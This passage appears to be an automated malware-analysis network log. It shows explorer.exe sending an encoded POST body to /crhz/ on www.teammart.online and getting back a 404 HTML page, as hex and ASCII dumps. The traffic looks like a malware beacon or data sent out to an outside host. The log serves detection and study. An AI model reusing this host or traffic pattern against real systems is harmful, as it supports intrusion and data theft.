22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
Jan 25, 2023 13:22:30.155781031 CET	183	IN	Data Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33 Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
Jan 25, 2023 13:22:30.155831099 CET	185	IN	Data Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
Jan 25, 2023 13:22:30.155885935 CET	186	IN	Data Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35 Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
Jan 25, 2023 13:22:30.155932903 CET	186	IN	Data Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20 Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49712	184.94.215.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:32.593597889 CET	192	OUT	POST /crhz/ HTTP/1.1 Host: www.teammart.online Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.teammart.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.teammart.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 37 58 64 4b 6f 67 6e 31 44 77 57 69 48 66 64 69 65 7a 6a 6a 78 2d 38 38 69 4c 31 66 78 58 62 36 46 58 68 41 69 4b 6d 57 4e 4f 43 48 63 57 5a 75 62 37 69 54 54 4b 55 70 7e 53 46 65 71 69 6c 72 79 6b 67 38 58 38 31 32 47 50 44 56 5a 33 44 7a 68 68 66 37 48 34 46 63 71 33 37 70 69 64 78 35 78 57 37 51 75 70 35 6a 34 44 68 68 7e 4f 31 67 4a 67 45 30 42 49 32 66 4a 70 43 6e 47 53 76 76 4d 42 33 4e 7e 63 78 74 4e 4f 5a 73 47 66 74 55 75 35 61 66 47 62 64 53 28 53 7a 6f 64 54 61 39 4f 64 38 73 32 77 74 44 36 4d 34 4d 35 55 43 35 71 38 36 76 43 6b 35 4d 5a 77 6c 4b 78 4b 41 6a 37 68 51 7a 55 41 6d 55 70 4a 7e 70 47 6a 35 37 73 6d 6a 38 56 4c 6d 51 5a 52 52 69 66 42 38 33 34 7a 42 4d 44 45 47 5a 4f 66 62 34 45 62 42 46 38 33 67 4d 66 66 50 47 62 70 76 43 58 79 74 5f 54 77 43 39 37 50 4d 4b 41 4f 54 76 48 48 42 53 64 6d 6e 75 62 41 68 6b 46 55 75 5f 58 6b 5a 47 52 77 50 49 61 47 72 57 54 66 6c 41 32 46 69 4d 69 61 39 57 68 55 65 6e 70 53 65 5f 5a 56 4b 78 43 62 42 6d 30 37 71 55 63 44 48 35 58 65 55 52 33 56 34 39 28 72 77 48 4c 2d 4f 4e 64 47 6c 74 44 66 67 66 76 7a 30 30 36 30 49 52 4a 68 31 5f 38 6f 45 55 37 4e 7a 57 6d 75 7a 47 6e 4e 34 6a 31 6b 7e 34 6f 43 6c 4e 45 66 33 69 6c 43 30 61 41 47 77 59 37 4c 68 70 65 74 56 34 47 76 43 78 52 63 54 6e 78 44 28 56 32 41 77 6d 65 54 55 62 66 43 6d 68 49 6e 79 51 4b 70 6a 30 4a 55 53 32 4a 66 61 46 38 68 79 61 37 78 77 63 5a 49 45 73 79 46 48 32 68 5a 6c 45 47 58 70 48 61 47 71 63 67 64 39 41 67 48 63 57 5a 63 50 6f 69 44 6c 44 74 33 7e 46 58 76 71 77 78 2d 53 54 52 76 42 30 37 6e 61 6b 64 54 58 7a 7a 36 39 32 76 45 67 36 52 54 32 38 38 2d 5a 6c 65 47 6d 77 39 43 4f 4c 73 6e 51 34 4c 6e 36 62 35 67 62 77 6a 79 38 65 72 48 69 6a 67 52 48 62 56 6f 66 5a 72 50 7e 59 73 5f 55 36 58 47 70 31 6e 58 6b 4f 73 6b 49 58 28 46 66 44 4b 49 32 54 31 52 6b 6d 6b 47 69 77 34 6d 7e 5f 65 52 35 69 58 54 56 39 36 73 77 4b 71 71 63 6f 6f 69 7a 4e 66 46 4b 4c 32 59 50 70 43 43 57 74 58 36 79 75 33 55 5a 61 4d 52 50 73 7a 73 6e 65 49 45 45 7a 66 36 66 7a 76 75 6d 74 30 4b 6f 48 54 2d 49 79 4c 72 71 69 47 6c 6f 63 38 74 35 79 64 44 74 6c 5a 41 50 61 6d 41 44 6e 31 51 4e 54 64 5f 34 4b 58 43 73 2d 46 46 6e 38 4a 41 4d 58 4b 56 76 6e 36 47 31 48 4b 51 30 4a 6c 66 33 43 31 78 73 78 64 57 31 49 28 48 50 42 46 6b 31 64 46 61 72 69 41 2d 75 53 55 69 58 37 56 63 6d 5a 4d 50 66 66 44 5a 6b 71 5a 46 58 50 70 42 52 77 46 4e 46 73 50 78 28 37 30 36 44 62 30 4f 53 46 75 77 5a 43 6a 64 57 36 72 74 49 43 48 6c 38 74 56 73 64 79 56 4a 56 55 52 41 7a 59 50 72 59 53 47 72 47 6b 53 47 43 6b 33 61 49 31 72 63 6d 34 7e 77 57 39 51 72 78 79 4c 76 58 2d 53 7a 31 6c 79 61 65 72 51 6a 30 65 33 49 28 79 57 62 66 39 58 49 78 79 79 78 61 4b 4e 63 47 53 56 46 7a 43 46 36 62 37 52 38 37 4d 59 6f 36 75 72 49 47 5a 36 66 61 41 57 67 75 4c 57 70 74 2d 4a 4a 70 4f 72 37 57 50 58 73 39 58 67 50 68 6c 39 7a 51 39 32 6a 75 67 33 78 52 7a 72 47 6a 70 66 79 5a 70 64 30 62 57 74 63 79 6c 4e 6e 30 76 44 34 30 61 4d 56 65 68 57 6d 7e 2d 78 6a 6c 41 30 39 38 4f 68 66 6c 33 4f 52 31 47 6b 43 75 71 6c 46 63 5a 6d 6d 4e 31 57 70 4c 77 62 75 54 50 75 77 37 78 31 54 51 6e 55 31 63 59 76 78 49 71 64 66 58 44 41 79 32 38 49 5f 28 71 63 6d 6f 66 53 51 69 51 35 46 30 79 68 59 48 36 65 2d 4a 4c 54 36 42 7a 48 34 41 47 6b 5a 69 35 28 77 66 32 6e 35 6e 4d 63 77 42 4f 76 35 69 61 58 7a 62 68 55 65 28 72 57 57 4e 5a 50 5f 58 4e 7e 62 53 6e 61 64 41 77 58 74 76 55 49 67 6f 6f 51 63 5a 55 31 65 37 5f 6c 78 61 77 28 77 32 65 66 35 36 6c 6b 48 47 45 44 52 73 4a 76 79 5a 41 35 76 63 6d 77 4b 58 50 78 47 54 4d 34 76 38 74 48 61 64 53 5a 49 77 5f 61 4f 35 67 59 78 59 57 34 6f 79 67 62 78 4d 77 66 5f 4c 44 6a 55 64 54 71 35 4d 6f 6e 6a 41 62 46 62 4c 38 66 72 47 62 72 4d 35 4d 71 46 77 42 56 79 36 74 31 47 7e 36 71 67 32 57 6f 53 46 53 63 73 33 70 6c 50 4a 4e 64 33 54 33 32 4d 73 49 4e 6a 63 51 28 36 34 5f 61 51 7a 55 41 4d 55 79 50 44 69 73 50 4d 7e 48 39 4b 64 69 4c 43 44 4c 30 6a 33 43 62 57 45 63 58 41 51 34 4d 34 7e 32 38 35 78 5a 61 5a 4e 71 7a 77 57 64 32 68 38 53 31 4d 6d 59 6c 68 66 33 70 5a 59 4f 6b 31 49 Data Ascii: Mkn=1bSqDFR5OvcN7XdKogn1DwWiHfdiezjjx-88iL1fxXb6FXhAiKmWNOCHcWZub7iTTKUp~SFeqilrykg8X812GPDVZ3Dzhhf7H4Fcq37pidx5xW7Qup5j4Dhh~O1gJgE0BI2fJpCnGSvvMB3N~cxtNOZsGftUu5afGbdS(SzodTa9Od8s2wtD6M4M5UC5q86vCk5MZwlKxKAj7hQzUAmUpJ~pGj57smj8VLmQZRRifB834zBMDEGZOfb4EbBF83gMffPGbpvCXyt_TwC97PMKAOTvHHBSdmnubAhkFUu_XkZGRwPIaGrWTflA2FiMia9WhUenpSe_ZVKxCbBm07qUcDH5XeUR3V49(rwHL-ONdGltDfgfvz0060IRJh1_8oEU7NzWmuzGnN4j1k~4oClNEf3ilC0aAGwY7LhpetV4GvCxRcTnxD(V2AwmeTUbfCmhInyQKpj0JUS2JfaF8hya7xwcZIEsyFH2hZlEGXpHaGqcgd9AgHcWZcPoiDlDt3~FXvqwx-STRvB07nakdTXzz692vEg6RT288-ZleGmw9COLsnQ4Ln6b5gbwjy8erHijgRHbVofZrP~Ys_U6XGp1nXkOskIX(FfDKI2T1RkmkGiw4m~_eR5iXTV96swKqqcooizNfFKL2YPpCCWtX6yu3UZaMRPszsneIEEzf6fzvumt0KoHT-IyLrqiGloc8t5ydDtlZAPamADn1QNTd_4KXCs-FFn8JAMXKVvn6G1HKQ0Jlf3C1xsxdW1I(HPBFk1dFariA-uSUiX7VcmZMPffDZkqZFXPpBRwFNFsPx(706Db0OSFuwZCjdW6rtICHl8tVsdyVJVURAzYPrYSGrGkSGCk3aI1rcm4~wW9QrxyLvX-Sz1lyaerQj0e3I(yWbf9XIxyyxaKNcGSVFzCF6b7R87MYo6urIGZ6faAWguLWpt-JJpOr7WPXs9XgPhl9zQ92jug3xRzrGjpfyZpd0bWtcylNn0vD40aMVehWm~-xjlA098Ohfl3OR1GkCuqlFcZmmN1WpLwbuTPuw7x1TQnU1cYvxIqdfXDAy28I_(qcmofSQiQ5F0yhYH6e-JLT6BzH4AGkZi5(wf2n5nMcwBOv5iaXzbhUe(rWWNZP_XN~bSnadAwXtvUIgooQcZU1e7_lxaw(w2ef56lkHGEDRsJvyZA5vcmwKXPxGTM4v8tHadSZIw_aO5gYxYW4oygbxMwf_LDjUdTq5MonjAbFbL8frGbrM5MqFwBVy6t1G~6qg2WoSFScs3plPJNd3T32MsINjcQ(64_aQzUAMUyPDisPM~H9KdiLCDL0j3CbWEcXAQ4M4~285xZaZNqzwWd2h8S1MmYlhf3pZYOk1ImUlY6atXz(cziAyNVWBn50vCyXIFHheG-5IiVSjAgCHdThdyx1zy2(62mlZN53xMr0PcRQdqdNSzj9jN4aGCucs8UGB3zM0R3r0ieam1xgMGORVHQ(rKTaptVsSIuW9pPyVHoZjpY1E~TI41XmoOV5nqPE5rqPtf7MFUxvalb0Uc-jb6P3MWIKvDhJ2Lq2dEwBtiZQLqKXxmUk5SFnckfkghYkYIr8Vxcg0fZyU1F4Fq4NG(LkwwAz6YgDa2DtvotYU4H6c~nf9IbFcNVuS7PbcSsgacSrCZvBAneo8hSthUxnQqVL_6Plyi4bCIFjMrm2Z83NQHDQhmdRqiaVQ5FfnMx7xXhJOJXyh3fp-bqebkb3Yq51pNF9EHJYSpugwefCd~ZNsV_Z2yUjokfch8tknQm9XTGGbPtmZwcb7m1AImDYXNKYeu24B8XAqjyO3JxPJazDhJXxaJj9TfVm_p00Ie5sDggicLLLa0QmMtsE9frfUauQcVlwqLWrGSADRfEy16M7w5FSu7aUfs01xvOcelAg5d2S69oRP2Evk6-PbxhEpq4TkJe7GTxuDF_34TQruPBbSIOkPg6T_sRj387dghTrhpAIxO7spEuw8tPkAo2wUMT24DTcFUBNw8WpVvXJ6(8aL4_QwoJwZ9WOf~sD0t5yuAwZvLFwPv5hiEsrjxwdGUNXTqU2MOgzKRcJqaN~fLDz7vJqH6Wg75J6_GVx78hjtVykcghx7iXK9IzfGq-tw9X4bdg7wruuxMRWRNMIhkpJ98G(-2Wj5LhEvVIS7iMo3S18_4lRY3q0DbanOWC42OhFnqzGnI6WddwHt3kUVxTT4ESuQNIf3z66dz0UQgIUlGFVlvUN6bURs~_2QZYIS2rXLU54I(bzZBEpQvcerI0AxWrOzM6OApckGupaPLR(i5CXkpjQFwv942oU6oftrlFf_B_C0S9J3De1yJXUJh0A1ttqP6Zm2lOcqMwdFfgTqLm9bKTP40XEHaOBKsfnqS4qstup4wqg65wuNUTWGxWjsI0QGD453esCTjKaiqI4FXq7ea2b6Y7p8Viqvc4487JSAomptH7aFlz8DQbNbfA1f2Nq1gSJaEWbYM-1ScLoI5MjFKSbdOL6bfxhPdyH0xXrrx7FVuvyTuJQbJbIRqAxocOt5kvKXFSrHyG1vTZ~yUP36zQEMaTB-RBX9(oAdrjHs9PXtByHcEYqBkhU6QlTXp7EXpIJL4OJzKYiOHivF(VkHUw~DysFidqoBdgFH0NhCiwCObb2RJav9wDbV56wsYt73kBun4cAy1YGVS-SXRQLquwYjkvXIi0jMQQrStZZR37ssdog_EESIA3gGpP~Fc7B-s7kK0in8kA5A8SL_caCMllQRr3WYPoncyyke(IgUcsPN01eLo2Tw73C3n_~GtqGhw3oPFfrLvAjsJRscJpNx7QxuV7GBAsbLRGYWkzaN~WsMnRbxFQDcZ5xJWnUQSCrQbTMl7cBKl4mr4FjCjcgTX6wFYifyD7QjmHYYAKMVXOKiOfDvRcskPgVi2ER7d04OCo6bX8Ybv8Rumb5g5Uf0DnG6~PZF3B01Q6bzlZkQ7wAxzH(ipE2Q6I6OHQ2orOpP6VSwjMSN7L(t9hj4M2wnIbAbzgjou2ZXZ0k_tONpo363fSf1HWBvEBue9m1LcYVG6d280-qk6cPsqrbf~4l-FjhqPQk8q6ZICchzA8Z5H1U3tRMs6B2pGzzT5LDQGJ1VJZZKT2SFieLG8McsqrYlAqtV0KW_6eYk6nGC~nG96LxyP2x2fbWen50WuwOqzeHcnufKX-rOVxutBsMwTI91izW9LhZ9cm2AfUSCWJJ-NemAvDKG80WvNZB9dEWiavSftXxKz4rSIaT9tdBS5SuJAZITghBROC~-ae5LAE~qDo9iPfl_OWhQGprKne0Yqsdv0sbRDIBxj4Zu~AIn8cPvhlYwHJ4EB7rshc8F6Bhmu27-Q0VF7kHnJeQ-9QbfvkH7EiYO9cPr4aXNMT5m94jeW_ucO90qznkd0t(FqHEQfejhvBJ4pkoXh4y-C1TfTDg2BCtlNDjh3NCshASoeK3xopbeQX3kIyDRRVJFf8Mu9hUkntXSKCRZ0RVC5sJZAURLhRW_SZFA1KKc64qOkQlRwOa-G3ixfQUjvEQOEHQWNV(BpZLS~b5YTRrYxNdRduRXXZ9DJqg1R98zYtmFz90uZnxqmowb9RILXSpV0yjTwFPd5E0vYNJP3MxVUmCAjQ5YOwkWs_dcDXkFqtkAs1iBbzHlYWeYVjSbruBNIrozYm2TXNYSasgMTSAAWAKsaZsXsJUdrzsQatiBV-akzRQpm8(OG3Clwo7TZU2Q1lZcOnR7wKlPBTYdu1IDURun8VcwdHLcwHIcGBjQyyvmXuXt1vTFGqQtf1AsjyVquyyli1bQhEfT6-LKWphpu9amU3Phb5jmZDRhui7HhoLZvh9WovSYOhZwU4VMakssrfKmTRCL6VDDqmBvXGuP1U4uXWAx6BYUT3A-wMIdUQ0T9JsO5YoFbmylKi7pEeNlR_adCynbeGpT1-oq5px8zr0XstbAHAurc9m48am5crMnXYcRixRqtPj76l7pgNDmJA6CjhJ2MNgDCHmIf9j3suscdrgDQFxY3ZuKo66wO7iEmcpmo1xlnKU2J0Px9EpM8VyfXObjfg8apEWNdCiQuUGw8117Nqnzj5RGQIzUZKCZdGVIWxa4
Jan 25, 2023 13:22:32.908425093 CET	194	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 12:22:32 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
Jan 25, 2023 13:22:32.908461094 CET	195	IN	Data Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33 Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
